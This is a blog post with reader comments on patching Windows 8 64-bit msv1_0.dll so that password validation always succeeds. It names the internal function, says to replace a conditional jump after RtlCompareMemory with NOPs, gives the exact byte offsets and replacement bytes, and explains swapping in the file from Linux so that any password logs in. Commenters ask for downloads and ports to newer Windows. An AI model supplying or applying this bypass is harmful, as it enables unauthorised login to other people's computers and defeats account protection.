Fun with msv1_0.dll in Windows 8 64bit

I’ve always wondered what this logo reminds me of…wait it was an old Greek state flag  from 1822 – 1969 The colors were used in the Greek revolution when they fought the Ottoman Empire.

OK, now we move next to the latest OS from Microsoft -> Windows 8 Pro 64bit. There seems to be a big void in the description of various functions inside the library, so it makes debugging harder, but not impossible. I had to go manually trough all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. There seems to be incomplete info on the Microsoft Symbol Server for the PDB of msv1_0.dll (or at least this is how I understand this)

So after a careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate :

It is :   sub_18001014C

Next we look for the RtlCompareMemory function and patch our jnz loc with NOP, in this case it is starting with loc_1800101F0 and jnz_loc 18001B4B7

So we open it in HEX view and do our modifications of the jnz_loc 18001B4B7

Produce a diff and patch the file, reboot to linux, copy over the C:\windows\system32\msv1_0.dll and reboot, any password should work to login into the system.

msv1_0.dll
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

12 Responses to Fun with msv1_0.dll in Windows 8 64bit

  1. x4r0r says:

    Where can I find the download ? !

  2. x4r0r says:

    Only what you copied and pasted? , Without modifying anything ! ???,

  3. B4ckBOne says:

    Thanks!
    I wondered why this is needed since there is Kon-Boot.
    But Kon-Boot is no longer for free :-/
    So thank you again & keep up the good work
    yours B4ckBOne

  4. SteveSi says:

    Can’t get patch of 8.1 32-bit to work (others OK). When I try to log on I get a RPC call error. Any idea how to get the patch to work?

  5. SteveSi says:

    Do you have time to look at Win10 TH2?

  6. SteveSi says:

    I tried looking for about 4 hours, but I couldn’t find similar code, so I think MS have changed the code a lot to maybe prevent this type of patching?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s